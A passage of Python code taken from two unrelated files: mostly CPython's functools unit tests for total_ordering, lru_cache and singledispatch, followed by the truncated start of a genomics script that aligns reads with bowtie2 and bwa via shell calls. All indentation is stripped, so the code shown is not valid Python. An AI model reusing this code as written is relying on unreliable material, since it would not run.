ImplementsGreaterThan(5) > ImplementsLessThan(5)
with self.subTest("GE >= GT"), self.assertRaises(TypeError):
ImplementsGreaterThanEqualTo(6) >= ImplementsGreaterThan(6)
with self.subTest("GE >= LE"), self.assertRaises(TypeError):
ImplementsGreaterThanEqualTo(7) >= ImplementsLessThanEqualTo(7)
with self.subTest("GE when equal"):
a = ComparatorNotImplemented(8)
b = ComparatorNotImplemented(8)
self.assertEqual(a, b)
with self.assertRaises(TypeError):
a >= b
with self.subTest("LE when equal"):
a = ComparatorNotImplemented(9)
b = ComparatorNotImplemented(9)
self.assertEqual(a, b)
with self.assertRaises(TypeError):
a <= b
def test_pickle(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
for name in '__lt__', '__gt__', '__le__', '__ge__':
with self.subTest(method=name, proto=proto):
method = getattr(Orderable_LT, name)
method_copy = pickle.loads(pickle.dumps(method, proto))
self.assertIs(method_copy, method)
@functools.total_ordering
class Orderable_LT:
def __init__(self, value):
self.value = value
def __lt__(self, other):
return self.value < other.value
def __eq__(self, other):
return self.value == other.value
class TestLRU:
def test_lru(self):
def orig(x, y):
return 3 * x + y
f = self.module.lru_cache(maxsize=20)(orig)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(maxsize, 20)
self.assertEqual(currsize, 0)
self.assertEqual(hits, 0)
self.assertEqual(misses, 0)
domain = range(5)
for i in range(1000):
x, y = choice(domain), choice(domain)
actual = f(x, y)
expected = orig(x, y)
self.assertEqual(actual, expected)
hits, misses, maxsize, currsize = f.cache_info()
self.assertTrue(hits > misses)
self.assertEqual(hits + misses, 1000)
self.assertEqual(currsize, 20)
f.cache_clear() # test clearing
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 0)
self.assertEqual(misses, 0)
self.assertEqual(currsize, 0)
f(x, y)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 0)
self.assertEqual(misses, 1)
self.assertEqual(currsize, 1)
# Test bypassing the cache
self.assertIs(f.__wrapped__, orig)
f.__wrapped__(x, y)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 0)
self.assertEqual(misses, 1)
self.assertEqual(currsize, 1)
# test size zero (which means "never-cache")
@self.module.lru_cache(0)
def f():
nonlocal f_cnt
f_cnt += 1
return 20
self.assertEqual(f.cache_info().maxsize, 0)
f_cnt = 0
for i in range(5):
self.assertEqual(f(), 20)
self.assertEqual(f_cnt, 5)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 0)
self.assertEqual(misses, 5)
self.assertEqual(currsize, 0)
# test size one
@self.module.lru_cache(1)
def f():
nonlocal f_cnt
f_cnt += 1
return 20
self.assertEqual(f.cache_info().maxsize, 1)
f_cnt = 0
for i in range(5):
self.assertEqual(f(), 20)
self.assertEqual(f_cnt, 1)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 4)
self.assertEqual(misses, 1)
self.assertEqual(currsize, 1)
# test size two
@self.module.lru_cache(2)
def f(x):
nonlocal f_cnt
f_cnt += 1
return x*10
self.assertEqual(f.cache_info().maxsize, 2)
f_cnt = 0
for x in 7, 9, 7, 9, 7, 9, 8, 8, 8, 9, 9, 9, 8, 8, 8, 7:
# * * * *
self.assertEqual(f(x), x*10)
self.assertEqual(f_cnt, 4)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 12)
self.assertEqual(misses, 4)
self.assertEqual(currsize, 2)
def test_lru_reentrancy_with_len(self):
# Test to make sure the LRU cache code isn't thrown-off by
# caching the built-in len() function. Since len() can be
# cached, we shouldn't use it inside the lru code itself.
old_len = builtins.len
try:
builtins.len = self.module.lru_cache(4)(len)
for i in [0, 0, 1, 2, 3, 3, 4, 5, 6, 1, 7, 2, 1]:
self.assertEqual(len('abcdefghijklmn'[:i]), i)
finally:
builtins.len = old_len
def test_lru_type_error(self):
# Regression test for issue #28653.
# lru_cache was leaking when one of the arguments
# wasn't cacheable.
@functools.lru_cache(maxsize=None)
def infinite_cache(o):
pass
@functools.lru_cache(maxsize=10)
def limited_cache(o):
pass
with self.assertRaises(TypeError):
infinite_cache([])
with self.assertRaises(TypeError):
limited_cache([])
def test_lru_with_maxsize_none(self):
@self.module.lru_cache(maxsize=None)
def fib(n):
if n < 2:
return n
return fib(n-1) + fib(n-2)
self.assertEqual([fib(n) for n in range(16)],
[0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610])
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=28, misses=16, maxsize=None, currsize=16))
fib.cache_clear()
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=0, misses=0, maxsize=None, currsize=0))
def test_lru_with_maxsize_negative(self):
@self.module.lru_cache(maxsize=-10)
def eq(n):
return n
for i in (0, 1):
self.assertEqual([eq(n) for n in range(150)], list(range(150)))
self.assertEqual(eq.cache_info(),
self.module._CacheInfo(hits=0, misses=300, maxsize=-10, currsize=1))
def test_lru_with_exceptions(self):
# Verify that user_function exceptions get passed through without
# creating a hard-to-read chained exception.
# http://bugs.python.org/issue13177
for maxsize in (None, 128):
@self.module.lru_cache(maxsize)
def func(i):
return 'abc'[i]
self.assertEqual(func(0), 'a')
with self.assertRaises(IndexError) as cm:
func(15)
self.assertIsNone(cm.exception.__context__)
# Verify that the previous exception did not result in a cached entry
with self.assertRaises(IndexError):
func(15)
def test_lru_with_types(self):
for maxsize in (None, 128):
@self.module.lru_cache(maxsize=maxsize, typed=True)
def square(x):
return x * x
self.assertEqual(square(3), 9)
self.assertEqual(type(square(3)), type(9))
self.assertEqual(square(3.0), 9.0)
self.assertEqual(type(square(3.0)), type(9.0))
self.assertEqual(square(x=3), 9)
self.assertEqual(type(square(x=3)), type(9))
self.assertEqual(square(x=3.0), 9.0)
self.assertEqual(type(square(x=3.0)), type(9.0))
self.assertEqual(square.cache_info().hits, 4)
self.assertEqual(square.cache_info().misses, 4)
def test_lru_with_keyword_args(self):
@self.module.lru_cache()
def fib(n):
if n < 2:
return n
return fib(n=n-1) + fib(n=n-2)
self.assertEqual(
[fib(n=number) for number in range(16)],
[0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610]
)
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=28, misses=16, maxsize=128, currsize=16))
fib.cache_clear()
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=0, misses=0, maxsize=128, currsize=0))
def test_lru_with_keyword_args_maxsize_none(self):
@self.module.lru_cache(maxsize=None)
def fib(n):
if n < 2:
return n
return fib(n=n-1) + fib(n=n-2)
self.assertEqual([fib(n=number) for number in range(16)],
[0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610])
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=28, misses=16, maxsize=None, currsize=16))
fib.cache_clear()
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=0, misses=0, maxsize=None, currsize=0))
def test_kwargs_order(self):
# PEP 468: Preserving Keyword Argument Order
@self.module.lru_cache(maxsize=10)
def f(**kwargs):
return list(kwargs.items())
self.assertEqual(f(a=1, b=2), [('a', 1), ('b', 2)])
self.assertEqual(f(b=2, a=1), [('b', 2), ('a', 1)])
self.assertEqual(f.cache_info(),
self.module._CacheInfo(hits=0, misses=2, maxsize=10, currsize=2))
def test_lru_cache_decoration(self):
def f(zomg: 'zomg_annotation'):
"""f doc string"""
return 42
g = self.module.lru_cache()(f)
for attr in self.module.WRAPPER_ASSIGNMENTS:
self.assertEqual(getattr(g, attr), getattr(f, attr))
@unittest.skipUnless(threading, 'This test requires threading.')
def test_lru_cache_threaded(self):
n, m = 5, 11
def orig(x, y):
return 3 * x + y
f = self.module.lru_cache(maxsize=n*m)(orig)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(currsize, 0)
start = threading.Event()
def full(k):
start.wait(10)
for _ in range(m):
self.assertEqual(f(k, 0), orig(k, 0))
def clear():
start.wait(10)
for _ in range(2*m):
f.cache_clear()
orig_si = sys.getswitchinterval()
support.setswitchinterval(1e-6)
try:
# create n threads in order to fill cache
threads = [threading.Thread(target=full, args=[k])
for k in range(n)]
with support.start_threads(threads):
start.set()
hits, misses, maxsize, currsize = f.cache_info()
if self.module is py_functools:
# XXX: Why can be not equal?
self.assertLessEqual(misses, n)
self.assertLessEqual(hits, m*n - misses)
else:
self.assertEqual(misses, n)
self.assertEqual(hits, m*n - misses)
self.assertEqual(currsize, n)
# create n threads in order to fill cache and 1 to clear it
threads = [threading.Thread(target=clear)]
threads += [threading.Thread(target=full, args=[k])
for k in range(n)]
start.clear()
with support.start_threads(threads):
start.set()
finally:
sys.setswitchinterval(orig_si)
@unittest.skipUnless(threading, 'This test requires threading.')
def test_lru_cache_threaded2(self):
# Simultaneous call with the same arguments
n, m = 5, 7
start = threading.Barrier(n+1)
pause = threading.Barrier(n+1)
stop = threading.Barrier(n+1)
@self.module.lru_cache(maxsize=m*n)
def f(x):
pause.wait(10)
return 3 * x
self.assertEqual(f.cache_info(), (0, 0, m*n, 0))
def test():
for i in range(m):
start.wait(10)
self.assertEqual(f(i), 3 * i)
stop.wait(10)
threads = [threading.Thread(target=test) for k in range(n)]
with support.start_threads(threads):
for i in range(m):
start.wait(10)
stop.reset()
pause.wait(10)
start.reset()
stop.wait(10)
pause.reset()
self.assertEqual(f.cache_info(), (0, (i+1)*n, m*n, i+1))
@unittest.skipUnless(threading, 'This test requires threading.')
def test_lru_cache_threaded3(self):
@self.module.lru_cache(maxsize=2)
def f(x):
time.sleep(.01)
return 3 * x
def test(i, x):
with self.subTest(thread=i):
self.assertEqual(f(x), 3 * x, i)
threads = [threading.Thread(target=test, args=(i, v))
for i, v in enumerate([1, 2, 2, 3, 2])]
with support.start_threads(threads):
pass
def test_need_for_rlock(self):
# This will deadlock on an LRU cache that uses a regular lock
@self.module.lru_cache(maxsize=10)
def test_func(x):
'Used to demonstrate a reentrant lru_cache call within a single thread'
return x
class DoubleEq:
'Demonstrate a reentrant lru_cache call within a single thread'
def __init__(self, x):
self.x = x
def __hash__(self):
return self.x
def __eq__(self, other):
if self.x == 2:
test_func(DoubleEq(1))
return self.x == other.x
test_func(DoubleEq(1)) # Load the cache
test_func(DoubleEq(2)) # Load the cache
self.assertEqual(test_func(DoubleEq(2)), # Trigger a re-entrant __eq__ call
DoubleEq(2)) # Verify the correct return value
def test_early_detection_of_bad_call(self):
# Issue #22184
with self.assertRaises(TypeError):
@functools.lru_cache
def f():
pass
def test_lru_method(self):
class X(int):
f_cnt = 0
@self.module.lru_cache(2)
def f(self, x):
self.f_cnt += 1
return x*10+self
a = X(5)
b = X(5)
c = X(7)
self.assertEqual(X.f.cache_info(), (0, 0, 2, 0))
for x in 1, 2, 2, 3, 1, 1, 1, 2, 3, 3:
self.assertEqual(a.f(x), x*10 + 5)
self.assertEqual((a.f_cnt, b.f_cnt, c.f_cnt), (6, 0, 0))
self.assertEqual(X.f.cache_info(), (4, 6, 2, 2))
for x in 1, 2, 1, 1, 1, 1, 3, 2, 2, 2:
self.assertEqual(b.f(x), x*10 + 5)
self.assertEqual((a.f_cnt, b.f_cnt, c.f_cnt), (6, 4, 0))
self.assertEqual(X.f.cache_info(), (10, 10, 2, 2))
for x in 2, 1, 1, 1, 1, 2, 1, 3, 2, 1:
self.assertEqual(c.f(x), x*10 + 7)
self.assertEqual((a.f_cnt, b.f_cnt, c.f_cnt), (6, 4, 5))
self.assertEqual(X.f.cache_info(), (15, 15, 2, 2))
self.assertEqual(a.f.cache_info(), X.f.cache_info())
self.assertEqual(b.f.cache_info(), X.f.cache_info())
self.assertEqual(c.f.cache_info(), X.f.cache_info())
def test_pickle(self):
cls = self.__class__
for f in cls.cached_func[0], cls.cached_meth, cls.cached_staticmeth:
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with self.subTest(proto=proto, func=f):
f_copy = pickle.loads(pickle.dumps(f, proto))
self.assertIs(f_copy, f)
def test_copy(self):
cls = self.__class__
def orig(x, y):
return 3 * x + y
part = self.module.partial(orig, 2)
funcs = (cls.cached_func[0], cls.cached_meth, cls.cached_staticmeth,
self.module.lru_cache(2)(part))
for f in funcs:
with self.subTest(func=f):
f_copy = copy.copy(f)
self.assertIs(f_copy, f)
def test_deepcopy(self):
cls = self.__class__
def orig(x, y):
return 3 * x + y
part = self.module.partial(orig, 2)
funcs = (cls.cached_func[0], cls.cached_meth, cls.cached_staticmeth,
self.module.lru_cache(2)(part))
for f in funcs:
with self.subTest(func=f):
f_copy = copy.deepcopy(f)
self.assertIs(f_copy, f)
@py_functools.lru_cache()
def py_cached_func(x, y):
return 3 * x + y
@c_functools.lru_cache()
def c_cached_func(x, y):
return 3 * x + y
class TestLRUPy(TestLRU, unittest.TestCase):
module = py_functools
cached_func = py_cached_func,
@module.lru_cache()
def cached_meth(self, x, y):
return 3 * x + y
@staticmethod
@module.lru_cache()
def cached_staticmeth(x, y):
return 3 * x + y
class TestLRUC(TestLRU, unittest.TestCase):
module = c_functools
cached_func = c_cached_func,
@module.lru_cache()
def cached_meth(self, x, y):
return 3 * x + y
@staticmethod
@module.lru_cache()
def cached_staticmeth(x, y):
return 3 * x + y
class TestSingleDispatch(unittest.TestCase):
def test_simple_overloads(self):
@functools.singledispatch
def g(obj):
return "base"
def g_int(i):
return "integer"
g.register(int, g_int)
self.assertEqual(g("str"), "base")
self.assertEqual(g(1), "integer")
self.assertEqual(g([1,2,3]), "base")
def test_mro(self):
@functools.singledispatch
def g(obj):
return "base"
class A:
pass
class C(A):
pass
class B(A):
pass
class D(C, B):
pass
def g_A(a):
return "A"
def g_B(b):
return "B"
g.register(A, g_A)
g.register(B, g_B)
self.assertEqual(g(A()), "A")
self.assertEqual(g(B()), "B")
self.assertEqual(g(C()), "A")
self.assertEqual(g(D()), "B")
def test_register_decorator(self):
@functools.singledispatch
def g(obj):
return "base"
@g.register(int)
def g_int(i):
return "int %s" % (i,)
self.assertEqual(g(""), "base")
self.assertEqual(g(12), "int 12")
self.assertIs(g.dispatch(int), g_int)
self.assertIs(g.dispatch(object), g.dispatch(str))
# Note: in the assert above this is not g.
# @singledispatch returns the wrapper.
def test_wrapping_attributes(self):
@functools.singledispatch
def g(obj):
"Simple test"
return "Test"
self.assertEqual(g.__name__, "g")
if sys.flags.optimize < 2:
self.assertEqual(g.__doc__, "Simple test")
@unittest.skipUnless(decimal, 'requires _decimal')
@support.cpython_only
def test_c_classes(self):
@functools.singledispatch
def g(obj):
return "base"
@g.register(decimal.DecimalException)
def _(obj):
return obj.args
subn = decimal.Subnormal("Exponent < Emin")
rnd = decimal.Rounded("Number got rounded")
self.assertEqual(g(subn), ("Exponent < Emin",))
self.assertEqual(g(rnd), ("Number got rounded",))
@g.register(decimal.Subnormal)
def _(obj):
return "Too small to care."
self.assertEqual(g(subn), "Too small to care.")
self.assertEqual(g(rnd), ("Number got rounded",))
def test_compose_mro(self):
# None of the examples in this test depend on haystack ordering.
c = collections
mro = functools._compose_mro
bases = [c.Sequence, c.MutableMapping, c.Mapping, c.Set]
for haystack in permutations(bases):
m = mro(dict, haystack)
self.assertEqual(m, [dict, c.MutableMapping, c.Mapping,
c.Collection, c.Sized, c.Iterable,
c.Container, object])
bases = [c.Container, c.Mapping, c.MutableMapping, c.OrderedDict]
for haystack in permutations(bases):
m = mro(c.ChainMap, haystack)
self.assertEqual(m, [c.ChainMap, c.MutableMapping, c.Mapping,
c.Collection, c.Sized, c.Iterable,
c.Container, object])
# If there's a generic function with implementations registered for
# both Sized and Container, passing a defaultdict to it results in an
# ambiguous dispatch which will cause a RuntimeError (see
# test_mro_conflicts).
bases = [c.Container, c.Sized, str]
for haystack in permutations(bases):
m = mro(c.defaultdict, [c.Sized, c.Container, str])
self.assertEqual(m, [c.defaultdict, dict, c.Sized, c.Container,
object])
# MutableSequence below is registered directly on D. In other words, it
# precedes MutableMapping which means single dispatch will always
# choose MutableSequence here.
class D(c.defaultdict):
pass
c.MutableSequence.register(D)
bases = [c.MutableSequence, c.MutableMapping]
for haystack in permutations(bases):
m = mro(D, bases)
self.assertEqual(m, [D, c.MutableSequence, c.Sequence, c.Reversible,
c.defaultdict, dict, c.MutableMapping, c.Mapping,
c.Collection, c.Sized, c.Iterable, c.Container,
object])
# Container and Callable are registered on different base classes and
# a generic function supporting both should always pick the Callable
# implementation if a C instance is passed.
class C(c.defaultdict):
def __call__(self):
pass
bases = [c.Sized, c.Callable, c.Container, c.Mapping]
for haystack in permutations(bases):
m = mro(C, haystack)
self.assertEqual(m, [C, c.Callable, c.defaultdict, dict, c.Mapping,
c.Collection, c.Sized, c.Iterable,
c.Container, object])
def test_register_abc(self):
c = collections
d = {"a": "b"}
l = [1, 2, 3]
s = {object(), None}
f = frozenset(s)
t = (1, 2, 3)
@functools.singledispatch
def g(obj):
return "base"
self.assertEqual(g(d), "base")
self.assertEqual(g(l), "base")
self.assertEqual(g(s), "base")
self.assertEqual(g(f), "base")
self.assertEqual(g(t), "base")
g.register(c.Sized, lambda obj: "sized")
self.assertEqual(g(d), "sized")
self.assertEqual(g(l), "sized")
self.assertEqual(g(s), "sized")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.MutableMapping, lambda obj: "mutablemapping")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "sized")
self.assertEqual(g(s), "sized")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.ChainMap, lambda obj: "chainmap")
self.assertEqual(g(d), "mutablemapping") # irrelevant ABCs registered
self.assertEqual(g(l), "sized")
self.assertEqual(g(s), "sized")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.MutableSequence, lambda obj: "mutablesequence")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "sized")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.MutableSet, lambda obj: "mutableset")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.Mapping, lambda obj: "mapping")
self.assertEqual(g(d), "mutablemapping") # not specific enough
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.Sequence, lambda obj: "sequence")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sequence")
g.register(c.Set, lambda obj: "set")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "set")
self.assertEqual(g(t), "sequence")
g.register(dict, lambda obj: "dict")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "set")
self.assertEqual(g(t), "sequence")
g.register(list, lambda obj: "list")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "set")
self.assertEqual(g(t), "sequence")
g.register(set, lambda obj: "concrete-set")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
self.assertEqual(g(s), "concrete-set")
self.assertEqual(g(f), "set")
self.assertEqual(g(t), "sequence")
g.register(frozenset, lambda obj: "frozen-set")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
self.assertEqual(g(s), "concrete-set")
self.assertEqual(g(f), "frozen-set")
self.assertEqual(g(t), "sequence")
g.register(tuple, lambda obj: "tuple")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
self.assertEqual(g(s), "concrete-set")
self.assertEqual(g(f), "frozen-set")
self.assertEqual(g(t), "tuple")
def test_c3_abc(self):
c = collections
mro = functools._c3_mro
class A(object):
pass
class B(A):
def __len__(self):
return 0 # implies Sized
@c.Container.register
class C(object):
pass
class D(object):
pass # unrelated
class X(D, C, B):
def __call__(self):
pass # implies Callable
expected = [X, c.Callable, D, C, c.Container, B, c.Sized, A, object]
for abcs in permutations([c.Sized, c.Callable, c.Container]):
self.assertEqual(mro(X, abcs=abcs), expected)
# unrelated ABCs don't appear in the resulting MRO
many_abcs = [c.Mapping, c.Sized, c.Callable, c.Container, c.Iterable]
self.assertEqual(mro(X, abcs=many_abcs), expected)
def test_false_meta(self):
# see issue23572
class MetaA(type):
def __len__(self):
return 0
class A(metaclass=MetaA):
pass
class AA(A):
pass
@functools.singledispatch
def fun(a):
return 'base A'
@fun.register(A)
def _(a):
return 'fun A'
aa = AA()
self.assertEqual(fun(aa), 'fun A')
def test_mro_conflicts(self):
c = collections
@functools.singledispatch
def g(arg):
return "base"
class O(c.Sized):
def __len__(self):
return 0
o = O()
self.assertEqual(g(o), "base")
g.register(c.Iterable, lambda arg: "iterable")
g.register(c.Container, lambda arg: "container")
g.register(c.Sized, lambda arg: "sized")
g.register(c.Set, lambda arg: "set")
self.assertEqual(g(o), "sized")
c.Iterable.register(O)
self.assertEqual(g(o), "sized") # because it's explicitly in __mro__
c.Container.register(O)
self.assertEqual(g(o), "sized") # see above: Sized is in __mro__
c.Set.register(O)
self.assertEqual(g(o), "set") # because c.Set is a subclass of
# c.Sized and c.Container
class P:
pass
p = P()
self.assertEqual(g(p), "base")
c.Iterable.register(P)
self.assertEqual(g(p), "iterable")
c.Container.register(P)
with self.assertRaises(RuntimeError) as re_one:
g(p)
self.assertIn(
str(re_one.exception),
(("Ambiguous dispatch: <class 'collections.abc.Container'> "
"or <class 'collections.abc.Iterable'>"),
("Ambiguous dispatch: <class 'collections.abc.Iterable'> "
"or <class 'collections.abc.Container'>")),
)
class Q(c.Sized):
def __len__(self):
return 0
q = Q()
self.assertEqual(g(q), "sized")
c.Iterable.register(Q)
self.assertEqual(g(q), "sized") # because it's explicitly in __mro__
c.Set.register(Q)
self.assertEqual(g(q), "set") # because c.Set is a subclass of
# c.Sized and c.Iterable
@functools.singledispatch
def h(arg):
return "base"
@h.register(c.Sized)
def _(arg):
return "sized"
@h.register(c.Container)
def _(arg):
return "container"
# Even though Sized and Container are explicit bases of MutableMapping,
# this ABC is implicitly registered on defaultdict which makes all of
# MutableMapping's bases implicit as well from defaultdict's
# perspective.
with self.assertRaises(RuntimeError) as re_two:
h(c.defaultdict(lambda: 0))
self.assertIn(
str(re_two.exception),
(("Ambiguous dispatch: <class 'collections.abc.Container'> "
"or <class 'collections.abc.Sized'>"),
("Ambiguous dispatch: <class 'collections.abc.Sized'> "
"or <class 'collections.abc.Container'>")),
)
class R(c.defaultdict):
pass
c.MutableSequence.register(R)
@functools.singledispatch
def i(arg):
return "base"
@i.register(c.MutableMapping)
def _(arg):
return "mapping"
@i.register(c.MutableSequence)
def _(arg):
return "sequence"
r = R()
self.assertEqual(i(r), "sequence")
class S:
pass
class T(S, c.Sized):
def __len__(self):
return 0
t = T()
self.assertEqual(h(t), "sized")
c.Container.register(T)
self.assertEqual(h(t), "sized") # because it's explicitly in the MRO
class U:
def __len__(self):
return 0
u = U()
self.assertEqual(h(u), "sized") # implicit Sized subclass inferred
# from the existence of __len__()
c.Container.register(U)
# There is no preference for registered versus inferred ABCs.
with self.assertRaises(RuntimeError) as re_three:
h(u)
self.assertIn(
str(re_three.exception),
(("Ambiguous dispatch: <class 'collections.abc.Container'> "
"or <class 'collections.abc.Sized'>"),
("Ambiguous dispatch: <class 'collections.abc.Sized'> "
"or <class 'collections.abc.Container'>")),
)
class V(c.Sized, S):
def __len__(self):
return 0
@functools.singledispatch
def j(arg):
return "base"
@j.register(S)
def _(arg):
return "s"
@j.register(c.Container)
def _(arg):
return "container"
v = V()
self.assertEqual(j(v), "s")
c.Container.register(V)
self.assertEqual(j(v), "container") # because it ends up right after
# Sized in the MRO
def test_cache_invalidation(self):
from collections import UserDict
class TracingDict(UserDict):
def __init__(self, *args, **kwargs):
super(TracingDict, self).__init__(*args, **kwargs)
self.set_ops = []
self.get_ops = []
def __getitem__(self, key):
result = self.data[key]
self.get_ops.append(key)
return result
def __setitem__(self, key, value):
self.set_ops.append(key)
self.data[key] = value
def clear(self):
self.data.clear()
_orig_wkd = functools.WeakKeyDictionary
td = TracingDict()
functools.WeakKeyDictionary = lambda: td
c = collections
@functools.singledispatch
def g(arg):
return "base"
d = {}
l = []
self.assertEqual(len(td), 0)
self.assertEqual(g(d), "base")
self.assertEqual(len(td), 1)
self.assertEqual(td.get_ops, [])
self.assertEqual(td.set_ops, [dict])
self.assertEqual(td.data[dict], g.registry[object])
self.assertEqual(g(l), "base")
self.assertEqual(len(td), 2)
self.assertEqual(td.get_ops, [])
self.assertEqual(td.set_ops, [dict, list])
self.assertEqual(td.data[dict], g.registry[object])
self.assertEqual(td.data[list], g.registry[object])
self.assertEqual(td.data[dict], td.data[list])
self.assertEqual(g(l), "base")
self.assertEqual(g(d), "base")
self.assertEqual(td.get_ops, [list, dict])
self.assertEqual(td.set_ops, [dict, list])
g.register(list, lambda arg: "list")
self.assertEqual(td.get_ops, [list, dict])
self.assertEqual(len(td), 0)
self.assertEqual(g(d), "base")
self.assertEqual(len(td), 1)
self.assertEqual(td.get_ops, [list, dict])
self.assertEqual(td.set_ops, [dict, list, dict])
self.assertEqual(td.data[dict],
functools._find_impl(dict, g.registry))
self.assertEqual(g(l), "list")
self.assertEqual(len(td), 2)
self.assertEqual(td.get_ops, [list, dict])
self.assertEqual(td.set_ops, [dict, list, dict, list])
self.assertEqual(td.data[list],
functools._find_impl(list, g.registry))
class X:
pass
c.MutableMapping.register(X) # Will not invalidate the cache,
# not using ABCs yet.
self.assertEqual(g(d), "base")
self.assertEqual(g(l), "list")
self.assertEqual(td.get_ops, [list, dict, dict, list])
self.assertEqual(td.set_ops, [dict, list, dict, list])
g.register(c.Sized, lambda arg: "sized")
self.assertEqual(len(td), 0)
self.assertEqual(g(d), "sized")
self.assertEqual(len(td), 1)
self.assertEqual(td.get_ops, [list, dict, dict, list])
self.assertEqual(td.set_ops, [dict, list, dict, list, dict])
self.assertEqual(g(l), "list")
self.assertEqual(len(td), 2)
self.assertEqual(td.get_ops, [list, dict, dict, list])
self.assertEqual(td.set_ops, [dict, list, dict, list, dict, list])
self.assertEqual(g(l), "list")
self.assertEqual(g(d), "sized")
self.assertEqual(td.get_ops, [list, dict, dict, list, list, dict])
self.assertEqual(td.set_ops, [dict, list, dict, list, dict, list])
g.dispatch(list)
g.dispatch(dict)
self.assertEqual(td.get_ops, [list, dict, dict, list, list, dict,
list, dict])
self.assertEqual(td.set_ops, [dict, list, dict, list, dict, list])
c.MutableSet.register(X) # Will invalidate the cache.
self.assertEqual(len(td), 2) # Stale cache.
self.assertEqual(g(l), "list")
self.assertEqual(len(td), 1)
g.register(c.MutableMapping, lambda arg: "mutablemapping")
self.assertEqual(len(td), 0)
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(len(td), 1)
self.assertEqual(g(l), "list")
self.assertEqual(len(td), 2)
g.register(dict, lambda arg: "dict")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
g._clear_cache()
self.assertEqual(len(td), 0)
functools.WeakKeyDictionary = _orig_wkd
if __name__ == '__main__':
unittest.main()
|
compare_read_mapping_sensitivity.py
|
import glob
from multiprocessing import Process, Manager, Value, Semaphore
import os
import pysam
from random import random
import sys
from reference_vntr import load_unique_vntrs_data
from sam_utils import get_id_of_reads_mapped_to_vntr_in_samfile
from vntr_finder import VNTRFinder
def clean_up_tmp():
os.system('rm -rf /tmp/*.sam')
os.system('rm -rf /tmp/*.fasta')
def bowtie_alignment(fasta_file, output, param):
os.system('bowtie2 -x hg19_chromosomes/hg19_bt2_idx --end-to-end -f %s -S %s --threads 24 --score-min L,-0.6,%s' % (fasta_file, output, param))
def bwa_alignment(fasta_file, output, param):
os.system('bwa mem -T %s -t 24 hg19_chromosomes/CombinedHG19_Reference.fa %s > %s' % (param, fasta_file, output))
def save_reads_stat(file_name, reads):
with open(file_name, 'w') as out:
for read in reads:
alignment_score = None
for key, value in read.tags:
if key == 'AS':
alignment_score = value
out.write('%s %s\n' % (read.qname, alignment_score))
def get_positive_and_fn_reads_from_samfile(sam_file, reference_vntr, true_reads, read_length=150):
alignment_file = pysam.AlignmentFile(sam_file, 'r', ignore_truncation=True)
start = reference_vntr.start_point
end = reference_vntr.start_point + reference_vntr.get_length()
positive_reads = []
false_negative_reads = []
try:
for read in alignment_file.fetch(until_eof=True):
if read.is_unmapped:
if read.qname in true_reads:
false_negative_reads.append(read)
continue
# if read.is_supplementary:
# continue
# if read.is_secondary:
# continue
if reference_vntr.chromosome == read.reference_name:
if start - read_length < read.reference_start < end:
positive_reads.append(read)
continue
if read.qname in true_reads:
false_negative_reads.append(read)
except IOError as err:
print('Catched IOError: ', err)
print('positive len:', len(positive_reads))
return positive_reads, false_negative_reads
def write_hmm_scores(simulated_samfile, true_reads_hmm_scores, false_reads_hmm_scores, ref_vntr, true_reads):
vntr_finder = VNTRFinder(ref_vntr)
hmm = vntr_finder.get_vntr_matcher_hmm(150)
manager = Manager()
false_scores = manager.list()
true_scores = manager.list()
process_list = []
sema = Semaphore(16)
samfile = pysam.AlignmentFile(simulated_samfile, 'r', ignore_truncation=True)
for read in samfile.fetch(until_eof=True):
if read.seq.count('N') > 0:
continue
if True:
if read.qname in true_reads:
sema.acquire()
p = Process(target=VNTRFinder.add_hmm_score_to_list, args=(sema, hmm, read, true_scores))
else:
if random() > 0.001:
continue
sema.acquire()
